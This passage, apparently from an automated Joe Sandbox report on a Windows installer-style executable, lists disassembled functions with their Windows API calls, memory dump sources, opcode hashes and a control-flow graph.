                                                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                  Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                  Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                  Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                  Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                  Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                  Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 3394109436-0
                                                                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                  Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                  Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                  Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                  • String ID:
                                                                                  • API String ID: 4115351271-0
                                                                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                                                                  Non-executed Functions

                                                                                  Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                  • EmptyClipboard.USER32 ref: 00405411
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                  • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                  • CloseClipboard.USER32 ref: 0040546E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                                                  • API String ID: 2110491804-2409696222
                                                                                  • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                  • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                  Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
